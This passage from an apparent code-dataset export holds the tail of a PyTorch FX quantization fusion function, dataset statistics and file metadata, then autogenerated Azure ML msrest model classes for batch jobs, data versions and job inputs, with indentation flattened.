fuser_method_mapping: Optional[Dict[Pattern, Union[torch.nn.Sequential, Callable]]]) -> Node:
additional_fuser_method_mapping = fuse_custom_config_dict.get("additional_fuser_method_mapping", {})
assert root_node.op == "call_module", "Expecting module node to be a call_module Node"
root_module = quantizer.modules[root_node.target]
assert len(additional_fuser_method_mapping) == 0, "Fusion implementation is "
"undergoing changes, additoinal_fuser_method_mapping is not supported currently."
def get_module(n):
if n.op == "call_module":
return quantizer.modules[n.target]
elif n.op == "call_function" and n.target == torch.nn.functional.relu:
relu = torch.nn.ReLU()
relu.training = root_module.training
return relu
return MatchAllNode
matched_modules = tuple(map(get_module, matched_node_pattern))
# since relu can be used multiple times, we'll need to create a relu module for each match
def get_type(m):
return type(m)
matched_module_types = tuple(map(get_type, matched_modules))
module_parent_name, module_name = _parent_name(root_node.target)
fuser_method = get_fuser_method_new(matched_module_types, fuser_method_mapping)
# TODO: change the signature for fuser_method to take matched module patterns
# as input
fused_module = fuser_method(*matched_modules)
setattr(quantizer.modules[module_parent_name], module_name, fused_module)
return quantizer.fused_graph.node_copy(root_node, load_arg)
| 48.89881
| 118
| 0.684967
| 1,064
| 8,215
| 5.040414
| 0.142857
| 0.08223
| 0.090062
| 0.106657
| 0.602834
| 0.576916
| 0.546336
| 0.521536
| 0.50028
| 0.44807
| 0
| 0.006008
| 0.20986
| 8,215
| 167
| 119
| 49.191617
| 0.820213
| 0.081071
| 0
| 0.35
| 0
| 0
| 0.044887
| 0.012351
| 0
| 0
| 0
| 0.005988
| 0.064286
| 1
| 0.057143
| false
| 0.014286
| 0.071429
| 0.007143
| 0.192857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a323da1e6144f951fab0d4c366a9e8d27bf93ca5
| 46,478
|
py
|
Python
|
sdk/ml/azure-ai-ml/azure/ai/ml/_restclient/v2020_09_01_dataplanepreview/models/_models.py
|
dubiety/azure-sdk-for-python
|
62ffa839f5d753594cf0fe63668f454a9d87a346
|
[
"MIT"
] | 1
|
2022-02-01T18:50:12.000Z
|
2022-02-01T18:50:12.000Z
|
sdk/ml/azure-ai-ml/azure/ai/ml/_restclient/v2020_09_01_dataplanepreview/models/_models.py
|
ellhe-blaster/azure-sdk-for-python
|
82193ba5e81cc5e5e5a5239bba58abe62e86f469
|
[
"MIT"
] | null | null | null |
sdk/ml/azure-ai-ml/azure/ai/ml/_restclient/v2020_09_01_dataplanepreview/models/_models.py
|
ellhe-blaster/azure-sdk-for-python
|
82193ba5e81cc5e5e5a5239bba58abe62e86f469
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class AssetJobInput(msrest.serialization.Model):
"""Asset input type.
All required parameters must be populated in order to send to Azure.
:ivar mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
"ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
:vartype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
:ivar uri: Required. Input Asset URI.
:vartype uri: str
"""
_validation = {
'uri': {'required': True, 'pattern': r'[a-zA-Z0-9_]'},
}
_attribute_map = {
'mode': {'key': 'mode', 'type': 'str'},
'uri': {'key': 'uri', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
"ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
:paramtype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
:keyword uri: Required. Input Asset URI.
:paramtype uri: str
"""
super(AssetJobInput, self).__init__(**kwargs)
self.mode = kwargs.get('mode', None)
self.uri = kwargs['uri']
class AssetJobOutput(msrest.serialization.Model):
"""Asset output type.
:ivar mode: Output Asset Delivery Mode. Possible values include: "ReadWriteMount", "Upload".
:vartype mode: str or ~azure.mgmt.machinelearningservices.models.OutputDeliveryMode
:ivar uri: Output Asset URI. This will have a default value of
"azureml/{jobId}/{outputFolder}/{outputFileName}" if omitted.
:vartype uri: str
"""
_attribute_map = {
'mode': {'key': 'mode', 'type': 'str'},
'uri': {'key': 'uri', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword mode: Output Asset Delivery Mode. Possible values include: "ReadWriteMount", "Upload".
:paramtype mode: str or ~azure.mgmt.machinelearningservices.models.OutputDeliveryMode
:keyword uri: Output Asset URI. This will have a default value of
"azureml/{jobId}/{outputFolder}/{outputFileName}" if omitted.
:paramtype uri: str
"""
super(AssetJobOutput, self).__init__(**kwargs)
self.mode = kwargs.get('mode', None)
self.uri = kwargs.get('uri', None)
class BatchJob(msrest.serialization.Model):
"""Batch endpoint job.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar compute: Compute configuration used to set instance count.
:vartype compute: ~azure.mgmt.machinelearningservices.models.ComputeConfiguration
:ivar dataset: Input dataset
This will be deprecated. Use InputData instead.
:vartype dataset: ~azure.mgmt.machinelearningservices.models.InferenceDataInputBase
:ivar description: The asset description text.
:vartype description: str
:ivar error_threshold: Error threshold, if the error count for the entire input goes above this
value,
the batch inference will be aborted. Range is [-1, int.MaxValue]
-1 value indicates, ignore all failures during batch inference.
:vartype error_threshold: int
:ivar input_data: Input data for the job.
:vartype input_data: dict[str, ~azure.mgmt.machinelearningservices.models.JobInput]
:ivar interaction_endpoints: Dictonary of endpoint URIs, keyed by enumerated job endpoints.
:vartype interaction_endpoints: dict[str,
~azure.mgmt.machinelearningservices.models.JobEndpoint]
:ivar logging_level: Logging level for batch inference operation. Possible values include:
"Info", "Warning", "Debug".
:vartype logging_level: str or ~azure.mgmt.machinelearningservices.models.BatchLoggingLevel
:ivar max_concurrency_per_instance: Indicates maximum number of parallelism per instance.
:vartype max_concurrency_per_instance: int
:ivar mini_batch_size: Size of the mini-batch passed to each batch invocation.
For FileDataset, this is the number of files per mini-batch.
For TabularDataset, this is the size of the records in bytes, per mini-batch.
:vartype mini_batch_size: long
:ivar name:
:vartype name: str
:ivar output: Location of the job output logs and artifacts.
:vartype output: ~azure.mgmt.machinelearningservices.models.JobOutputArtifacts
:ivar output_data: Job output data location
Optional parameter: when not specified, the default location is
workspaceblobstore location.
:vartype output_data: dict[str, ~azure.mgmt.machinelearningservices.models.JobOutputV2]
:ivar output_dataset: Output dataset location
Optional parameter: when not specified, the default location is
workspaceblobstore location.
This will be deprecated. Use OutputData instead.
:vartype output_dataset: ~azure.mgmt.machinelearningservices.models.DataVersion
:ivar output_file_name: Output file name.
:vartype output_file_name: str
:ivar partition_keys: Partition keys list used for Named partitioning.
:vartype partition_keys: list[str]
:ivar properties: The asset property dictionary.
:vartype properties: dict[str, str]
:ivar provisioning_state: Possible values include: "Succeeded", "Failed", "Canceled",
"InProgress".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.JobProvisioningState
:ivar retry_settings: Retry Settings for the batch inference operation.
:vartype retry_settings: ~azure.mgmt.machinelearningservices.models.BatchRetrySettings
:ivar status: Status of the job. Possible values include: "NotStarted", "Starting",
"Provisioning", "Preparing", "Queued", "Running", "Finalizing", "CancelRequested", "Completed",
"Failed", "Canceled", "NotResponding", "Paused", "Unknown".
:vartype status: str or ~azure.mgmt.machinelearningservices.models.JobStatus
:ivar tags: A set of tags. Tag dictionary. Tags can be added, removed, and updated.
:vartype tags: dict[str, str]
"""
_validation = {
'interaction_endpoints': {'readonly': True},
'output': {'readonly': True},
'provisioning_state': {'readonly': True},
'status': {'readonly': True},
}
_attribute_map = {
'compute': {'key': 'compute', 'type': 'ComputeConfiguration'},
'dataset': {'key': 'dataset', 'type': 'InferenceDataInputBase'},
'description': {'key': 'description', 'type': 'str'},
'error_threshold': {'key': 'errorThreshold', 'type': 'int'},
'input_data': {'key': 'inputData', 'type': '{JobInput}'},
'interaction_endpoints': {'key': 'interactionEndpoints', 'type': '{JobEndpoint}'},
'logging_level': {'key': 'loggingLevel', 'type': 'str'},
'max_concurrency_per_instance': {'key': 'maxConcurrencyPerInstance', 'type': 'int'},
'mini_batch_size': {'key': 'miniBatchSize', 'type': 'long'},
'name': {'key': 'name', 'type': 'str'},
'output': {'key': 'output', 'type': 'JobOutputArtifacts'},
'output_data': {'key': 'outputData', 'type': '{JobOutputV2}'},
'output_dataset': {'key': 'outputDataset', 'type': 'DataVersion'},
'output_file_name': {'key': 'outputFileName', 'type': 'str'},
'partition_keys': {'key': 'partitionKeys', 'type': '[str]'},
'properties': {'key': 'properties', 'type': '{str}'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'retry_settings': {'key': 'retrySettings', 'type': 'BatchRetrySettings'},
'status': {'key': 'status', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
}
def __init__(
self,
**kwargs
):
"""
:keyword compute: Compute configuration used to set instance count.
:paramtype compute: ~azure.mgmt.machinelearningservices.models.ComputeConfiguration
:keyword dataset: Input dataset
This will be deprecated. Use InputData instead.
:paramtype dataset: ~azure.mgmt.machinelearningservices.models.InferenceDataInputBase
:keyword description: The asset description text.
:paramtype description: str
:keyword error_threshold: Error threshold, if the error count for the entire input goes above
this value,
the batch inference will be aborted. Range is [-1, int.MaxValue]
-1 value indicates, ignore all failures during batch inference.
:paramtype error_threshold: int
:keyword input_data: Input data for the job.
:paramtype input_data: dict[str, ~azure.mgmt.machinelearningservices.models.JobInput]
:keyword logging_level: Logging level for batch inference operation. Possible values include:
"Info", "Warning", "Debug".
:paramtype logging_level: str or ~azure.mgmt.machinelearningservices.models.BatchLoggingLevel
:keyword max_concurrency_per_instance: Indicates maximum number of parallelism per instance.
:paramtype max_concurrency_per_instance: int
:keyword mini_batch_size: Size of the mini-batch passed to each batch invocation.
For FileDataset, this is the number of files per mini-batch.
For TabularDataset, this is the size of the records in bytes, per mini-batch.
:paramtype mini_batch_size: long
:keyword name:
:paramtype name: str
:keyword output_data: Job output data location
Optional parameter: when not specified, the default location is
workspaceblobstore location.
:paramtype output_data: dict[str, ~azure.mgmt.machinelearningservices.models.JobOutputV2]
:keyword output_dataset: Output dataset location
Optional parameter: when not specified, the default location is
workspaceblobstore location.
This will be deprecated. Use OutputData instead.
:paramtype output_dataset: ~azure.mgmt.machinelearningservices.models.DataVersion
:keyword output_file_name: Output file name.
:paramtype output_file_name: str
:keyword partition_keys: Partition keys list used for Named partitioning.
:paramtype partition_keys: list[str]
:keyword properties: The asset property dictionary.
:paramtype properties: dict[str, str]
:keyword retry_settings: Retry Settings for the batch inference operation.
:paramtype retry_settings: ~azure.mgmt.machinelearningservices.models.BatchRetrySettings
:keyword tags: A set of tags. Tag dictionary. Tags can be added, removed, and updated.
:paramtype tags: dict[str, str]
"""
super(BatchJob, self).__init__(**kwargs)
self.compute = kwargs.get('compute', None)
self.dataset = kwargs.get('dataset', None)
self.description = kwargs.get('description', None)
self.error_threshold = kwargs.get('error_threshold', None)
self.input_data = kwargs.get('input_data', None)
self.interaction_endpoints = None
self.logging_level = kwargs.get('logging_level', None)
self.max_concurrency_per_instance = kwargs.get('max_concurrency_per_instance', None)
self.mini_batch_size = kwargs.get('mini_batch_size', None)
self.name = kwargs.get('name', None)
self.output = None
self.output_data = kwargs.get('output_data', None)
self.output_dataset = kwargs.get('output_dataset', None)
self.output_file_name = kwargs.get('output_file_name', None)
self.partition_keys = kwargs.get('partition_keys', None)
self.properties = kwargs.get('properties', None)
self.provisioning_state = None
self.retry_settings = kwargs.get('retry_settings', None)
self.status = None
self.tags = kwargs.get('tags', None)
class Resource(msrest.serialization.Model):
"""Common fields that are returned in the response for all Azure Resource Manager resources.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
"""
super(Resource, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
class BatchJobResource(Resource):
"""Azure Resource Manager resource envelope.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar properties: Required. [Required] Additional attributes of the entity.
:vartype properties: ~azure.mgmt.machinelearningservices.models.BatchJob
:ivar system_data: System data associated with resource provider.
:vartype system_data: ~azure.mgmt.machinelearningservices.models.SystemData
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'properties': {'required': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'BatchJob'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
}
def __init__(
self,
**kwargs
):
"""
:keyword properties: Required. [Required] Additional attributes of the entity.
:paramtype properties: ~azure.mgmt.machinelearningservices.models.BatchJob
"""
super(BatchJobResource, self).__init__(**kwargs)
self.properties = kwargs['properties']
self.system_data = None
class BatchJobResourceArmPaginatedResult(msrest.serialization.Model):
"""A paginated list of BatchJob entities.
:ivar next_link: The link to the next page of BatchJob objects. If null, there are no
additional pages.
:vartype next_link: str
:ivar value: An array of objects of type BatchJob.
:vartype value: list[~azure.mgmt.machinelearningservices.models.BatchJobResource]
"""
_attribute_map = {
'next_link': {'key': 'nextLink', 'type': 'str'},
'value': {'key': 'value', 'type': '[BatchJobResource]'},
}
def __init__(
self,
**kwargs
):
"""
:keyword next_link: The link to the next page of BatchJob objects. If null, there are no
additional pages.
:paramtype next_link: str
:keyword value: An array of objects of type BatchJob.
:paramtype value: list[~azure.mgmt.machinelearningservices.models.BatchJobResource]
"""
super(BatchJobResourceArmPaginatedResult, self).__init__(**kwargs)
self.next_link = kwargs.get('next_link', None)
self.value = kwargs.get('value', None)
class BatchRetrySettings(msrest.serialization.Model):
"""Retry settings for a batch inference operation.
:ivar max_retries: Maximum retry count for a mini-batch.
:vartype max_retries: int
:ivar timeout: Invocation timeout for a mini-batch, in ISO 8601 format.
:vartype timeout: ~datetime.timedelta
"""
_attribute_map = {
'max_retries': {'key': 'maxRetries', 'type': 'int'},
'timeout': {'key': 'timeout', 'type': 'duration'},
}
def __init__(
self,
**kwargs
):
"""
:keyword max_retries: Maximum retry count for a mini-batch.
:paramtype max_retries: int
:keyword timeout: Invocation timeout for a mini-batch, in ISO 8601 format.
:paramtype timeout: ~datetime.timedelta
"""
super(BatchRetrySettings, self).__init__(**kwargs)
self.max_retries = kwargs.get('max_retries', None)
self.timeout = kwargs.get('timeout', None)
class ComputeConfiguration(msrest.serialization.Model):
"""Configuration for compute binding.
:ivar instance_count: Number of instances or nodes.
:vartype instance_count: int
:ivar instance_type: SKU type to run on.
:vartype instance_type: str
:ivar is_local: Set to true for jobs running on local compute.
:vartype is_local: bool
:ivar location: Location for virtual cluster run.
:vartype location: str
:ivar properties: Additional properties.
:vartype properties: dict[str, str]
:ivar target: ARM resource ID of the Compute you are targeting. If not provided the resource
will be deployed as Managed.
:vartype target: str
"""
_attribute_map = {
'instance_count': {'key': 'instanceCount', 'type': 'int'},
'instance_type': {'key': 'instanceType', 'type': 'str'},
'is_local': {'key': 'isLocal', 'type': 'bool'},
'location': {'key': 'location', 'type': 'str'},
'properties': {'key': 'properties', 'type': '{str}'},
'target': {'key': 'target', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword instance_count: Number of instances or nodes.
:paramtype instance_count: int
:keyword instance_type: SKU type to run on.
:paramtype instance_type: str
:keyword is_local: Set to true for jobs running on local compute.
:paramtype is_local: bool
:keyword location: Location for virtual cluster run.
:paramtype location: str
:keyword properties: Additional properties.
:paramtype properties: dict[str, str]
:keyword target: ARM resource ID of the Compute you are targeting. If not provided the resource
will be deployed as Managed.
:paramtype target: str
"""
super(ComputeConfiguration, self).__init__(**kwargs)
self.instance_count = kwargs.get('instance_count', None)
self.instance_type = kwargs.get('instance_type', None)
self.is_local = kwargs.get('is_local', None)
self.location = kwargs.get('location', None)
self.properties = kwargs.get('properties', None)
self.target = kwargs.get('target', None)
class DataVersion(msrest.serialization.Model):
"""Data asset version details.
All required parameters must be populated in order to send to Azure.
:ivar dataset_type: The Format of dataset. Possible values include: "Simple", "Dataflow".
:vartype dataset_type: str or ~azure.mgmt.machinelearningservices.models.DatasetType
:ivar datastore_id: ARM resource ID of the datastore where the asset is located.
:vartype datastore_id: str
:ivar description: The asset description text.
:vartype description: str
:ivar is_anonymous: If the name version are system generated (anonymous registration).
:vartype is_anonymous: bool
:ivar path: Required. [Required] The path of the file/directory in the datastore.
:vartype path: str
:ivar properties: The asset property dictionary.
:vartype properties: dict[str, str]
:ivar tags: A set of tags. Tag dictionary. Tags can be added, removed, and updated.
:vartype tags: dict[str, str]
"""
_validation = {
'path': {'required': True, 'pattern': r'[a-zA-Z0-9_]'},
}
_attribute_map = {
'dataset_type': {'key': 'datasetType', 'type': 'str'},
'datastore_id': {'key': 'datastoreId', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'is_anonymous': {'key': 'isAnonymous', 'type': 'bool'},
'path': {'key': 'path', 'type': 'str'},
'properties': {'key': 'properties', 'type': '{str}'},
'tags': {'key': 'tags', 'type': '{str}'},
}
def __init__(
self,
**kwargs
):
"""
:keyword dataset_type: The Format of dataset. Possible values include: "Simple", "Dataflow".
:paramtype dataset_type: str or ~azure.mgmt.machinelearningservices.models.DatasetType
:keyword datastore_id: ARM resource ID of the datastore where the asset is located.
:paramtype datastore_id: str
:keyword description: The asset description text.
:paramtype description: str
:keyword is_anonymous: If the name version are system generated (anonymous registration).
:paramtype is_anonymous: bool
:keyword path: Required. [Required] The path of the file/directory in the datastore.
:paramtype path: str
:keyword properties: The asset property dictionary.
:paramtype properties: dict[str, str]
:keyword tags: A set of tags. Tag dictionary. Tags can be added, removed, and updated.
:paramtype tags: dict[str, str]
"""
super(DataVersion, self).__init__(**kwargs)
self.dataset_type = kwargs.get('dataset_type', None)
self.datastore_id = kwargs.get('datastore_id', None)
self.description = kwargs.get('description', None)
self.is_anonymous = kwargs.get('is_anonymous', None)
self.path = kwargs['path']
self.properties = kwargs.get('properties', None)
self.tags = kwargs.get('tags', None)
class ErrorDetail(msrest.serialization.Model):
"""Error detail information.
All required parameters must be populated in order to send to Azure.
:ivar code: Required. Error code.
:vartype code: str
:ivar message: Required. Error message.
:vartype message: str
"""
_validation = {
'code': {'required': True},
'message': {'required': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword code: Required. Error code.
:paramtype code: str
:keyword message: Required. Error message.
:paramtype message: str
"""
super(ErrorDetail, self).__init__(**kwargs)
self.code = kwargs['code']
self.message = kwargs['message']
class ErrorResponse(msrest.serialization.Model):
"""Error response information.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar code: Error code.
:vartype code: str
:ivar message: Error message.
:vartype message: str
:ivar details: An array of error detail objects.
:vartype details: list[~azure.mgmt.machinelearningservices.models.ErrorDetail]
"""
_validation = {
'code': {'readonly': True},
'message': {'readonly': True},
'details': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'details': {'key': 'details', 'type': '[ErrorDetail]'},
}
def __init__(
self,
**kwargs
):
"""
"""
super(ErrorResponse, self).__init__(**kwargs)
self.code = None
self.message = None
self.details = None
class InferenceDataInputBase(msrest.serialization.Model):
"""InferenceDataInputBase.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: InferenceDataUrlInput, InferenceDatasetIdInput, InferenceDatasetInput.
All required parameters must be populated in order to send to Azure.
:ivar data_input_type: Required. Constant filled by server. Possible values include:
"DatasetVersion", "DatasetId", "DataUrl".
:vartype data_input_type: str or
~azure.mgmt.machinelearningservices.models.InferenceDataInputType
"""
_validation = {
'data_input_type': {'required': True},
}
_attribute_map = {
'data_input_type': {'key': 'dataInputType', 'type': 'str'},
}
_subtype_map = {
'data_input_type': {'DataUrl': 'InferenceDataUrlInput', 'DatasetId': 'InferenceDatasetIdInput', 'DatasetVersion': 'InferenceDatasetInput'}
}
def __init__(
self,
**kwargs
):
"""
"""
super(InferenceDataInputBase, self).__init__(**kwargs)
self.data_input_type = None # type: Optional[str]
class InferenceDatasetIdInput(InferenceDataInputBase):
"""InferenceDatasetIdInput.
All required parameters must be populated in order to send to Azure.
:ivar data_input_type: Required. Constant filled by server. Possible values include:
"DatasetVersion", "DatasetId", "DataUrl".
:vartype data_input_type: str or
~azure.mgmt.machinelearningservices.models.InferenceDataInputType
:ivar dataset_id: ARM ID of the input dataset.
:vartype dataset_id: str
"""
_validation = {
'data_input_type': {'required': True},
}
_attribute_map = {
'data_input_type': {'key': 'dataInputType', 'type': 'str'},
'dataset_id': {'key': 'datasetId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword dataset_id: ARM ID of the input dataset.
:paramtype dataset_id: str
"""
super(InferenceDatasetIdInput, self).__init__(**kwargs)
self.data_input_type = 'DatasetId' # type: str
self.dataset_id = kwargs.get('dataset_id', None)
class InferenceDatasetInput(InferenceDataInputBase):
"""InferenceDatasetInput.
All required parameters must be populated in order to send to Azure.
:ivar data_input_type: Required. Constant filled by server. Possible values include:
"DatasetVersion", "DatasetId", "DataUrl".
:vartype data_input_type: str or
~azure.mgmt.machinelearningservices.models.InferenceDataInputType
:ivar dataset_name: Name of the input dataset.
:vartype dataset_name: str
:ivar dataset_version: Version of the input dataset.
:vartype dataset_version: str
"""
_validation = {
'data_input_type': {'required': True},
}
_attribute_map = {
'data_input_type': {'key': 'dataInputType', 'type': 'str'},
'dataset_name': {'key': 'datasetName', 'type': 'str'},
'dataset_version': {'key': 'datasetVersion', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword dataset_name: Name of the input dataset.
:paramtype dataset_name: str
:keyword dataset_version: Version of the input dataset.
:paramtype dataset_version: str
"""
super(InferenceDatasetInput, self).__init__(**kwargs)
self.data_input_type = 'DatasetVersion' # type: str
self.dataset_name = kwargs.get('dataset_name', None)
self.dataset_version = kwargs.get('dataset_version', None)
class InferenceDataUrlInput(InferenceDataInputBase):
"""InferenceDataUrlInput.
All required parameters must be populated in order to send to Azure.
:ivar data_input_type: Required. Constant filled by server. Possible values include:
"DatasetVersion", "DatasetId", "DataUrl".
:vartype data_input_type: str or
~azure.mgmt.machinelearningservices.models.InferenceDataInputType
:ivar path: Required. Asset path to the input data, say a blob URL.
:vartype path: str
"""
_validation = {
'data_input_type': {'required': True},
'path': {'required': True, 'pattern': r'[a-zA-Z0-9_]'},
}
_attribute_map = {
'data_input_type': {'key': 'dataInputType', 'type': 'str'},
'path': {'key': 'path', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword path: Required. Asset path to the input data, say a blob URL.
:paramtype path: str
"""
super(InferenceDataUrlInput, self).__init__(**kwargs)
self.data_input_type = 'DataUrl' # type: str
self.path = kwargs['path']
class JobEndpoint(msrest.serialization.Model):
"""Job endpoint definition.
:ivar endpoint: Url for endpoint.
:vartype endpoint: str
:ivar job_endpoint_type: Endpoint type.
:vartype job_endpoint_type: str
:ivar port: Port for endpoint.
:vartype port: int
:ivar properties: Additional properties to set on the endpoint.
:vartype properties: dict[str, str]
"""
_attribute_map = {
'endpoint': {'key': 'endpoint', 'type': 'str'},
'job_endpoint_type': {'key': 'jobEndpointType', 'type': 'str'},
'port': {'key': 'port', 'type': 'int'},
'properties': {'key': 'properties', 'type': '{str}'},
}
def __init__(
self,
**kwargs
):
"""
:keyword endpoint: Url for endpoint.
:paramtype endpoint: str
:keyword job_endpoint_type: Endpoint type.
:paramtype job_endpoint_type: str
:keyword port: Port for endpoint.
:paramtype port: int
:keyword properties: Additional properties to set on the endpoint.
:paramtype properties: dict[str, str]
"""
super(JobEndpoint, self).__init__(**kwargs)
self.endpoint = kwargs.get('endpoint', None)
self.job_endpoint_type = kwargs.get('job_endpoint_type', None)
self.port = kwargs.get('port', None)
self.properties = kwargs.get('properties', None)
class JobInput(msrest.serialization.Model):
"""Job input definition.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: MLTableJobInput, UriFileJobInput, UriFolderJobInput.
All required parameters must be populated in order to send to Azure.
:ivar description: Description for the input.
:vartype description: str
:ivar job_input_type: Required. Specifies the type of job.Constant filled by server. Possible
values include: "UriFile", "UriFolder", "MLTable".
:vartype job_input_type: str or ~azure.mgmt.machinelearningservices.models.JobInputType
"""
_validation = {
'job_input_type': {'required': True},
}
_attribute_map = {
'description': {'key': 'description', 'type': 'str'},
'job_input_type': {'key': 'jobInputType', 'type': 'str'},
}
_subtype_map = {
'job_input_type': {'MLTable': 'MLTableJobInput', 'UriFile': 'UriFileJobInput', 'UriFolder': 'UriFolderJobInput'}
}
def __init__(
self,
**kwargs
):
"""
:keyword description: Description for the input.
:paramtype description: str
"""
super(JobInput, self).__init__(**kwargs)
self.description = kwargs.get('description', None)
self.job_input_type = None # type: Optional[str]
class JobOutputArtifacts(msrest.serialization.Model):
"""Job output definition container information on where to find job logs and artifacts.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar datastore_id: ARM ID of the datastore where the job logs and artifacts are stored.
:vartype datastore_id: str
:ivar path: Path within the datastore to the job logs and artifacts.
:vartype path: str
"""
_validation = {
'datastore_id': {'readonly': True},
'path': {'readonly': True},
}
_attribute_map = {
'datastore_id': {'key': 'datastoreId', 'type': 'str'},
'path': {'key': 'path', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
"""
super(JobOutputArtifacts, self).__init__(**kwargs)
self.datastore_id = None
self.path = None
class JobOutputV2(msrest.serialization.Model):
"""Job output definition container information on where to find the job output.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: UriFileJobOutput.
All required parameters must be populated in order to send to Azure.
:ivar description: Description for the output.
:vartype description: str
:ivar job_output_type: Required. Specifies the type of job.Constant filled by server. Possible
values include: "UriFile".
:vartype job_output_type: str or ~azure.mgmt.machinelearningservices.models.JobOutputType
"""
_validation = {
'job_output_type': {'required': True},
}
_attribute_map = {
'description': {'key': 'description', 'type': 'str'},
'job_output_type': {'key': 'jobOutputType', 'type': 'str'},
}
_subtype_map = {
'job_output_type': {'UriFile': 'UriFileJobOutput'}
}
def __init__(
self,
**kwargs
):
"""
:keyword description: Description for the output.
:paramtype description: str
"""
super(JobOutputV2, self).__init__(**kwargs)
self.description = kwargs.get('description', None)
self.job_output_type = None # type: Optional[str]
class LabelClass(msrest.serialization.Model):
"""Label class definition.
:ivar display_name: Display name of the label class.
:vartype display_name: str
:ivar subclasses: Dictionary of subclasses of the label class.
:vartype subclasses: dict[str, ~azure.mgmt.machinelearningservices.models.LabelClass]
"""
_attribute_map = {
'display_name': {'key': 'displayName', 'type': 'str'},
'subclasses': {'key': 'subclasses', 'type': '{LabelClass}'},
}
def __init__(
self,
**kwargs
):
"""
:keyword display_name: Display name of the label class.
:paramtype display_name: str
:keyword subclasses: Dictionary of subclasses of the label class.
:paramtype subclasses: dict[str, ~azure.mgmt.machinelearningservices.models.LabelClass]
"""
super(LabelClass, self).__init__(**kwargs)
self.display_name = kwargs.get('display_name', None)
self.subclasses = kwargs.get('subclasses', None)
class MLTableJobInput(JobInput, AssetJobInput):
"""MLTableJobInput.
All required parameters must be populated in order to send to Azure.
:ivar mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
"ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
:vartype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
:ivar uri: Required. Input Asset URI.
:vartype uri: str
:ivar description: Description for the input.
:vartype description: str
:ivar job_input_type: Required. Specifies the type of job.Constant filled by server. Possible
values include: "UriFile", "UriFolder", "MLTable".
:vartype job_input_type: str or ~azure.mgmt.machinelearningservices.models.JobInputType
"""
_validation = {
'uri': {'required': True, 'pattern': r'[a-zA-Z0-9_]'},
'job_input_type': {'required': True},
}
_attribute_map = {
'mode': {'key': 'mode', 'type': 'str'},
'uri': {'key': 'uri', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'job_input_type': {'key': 'jobInputType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
"ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
:paramtype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
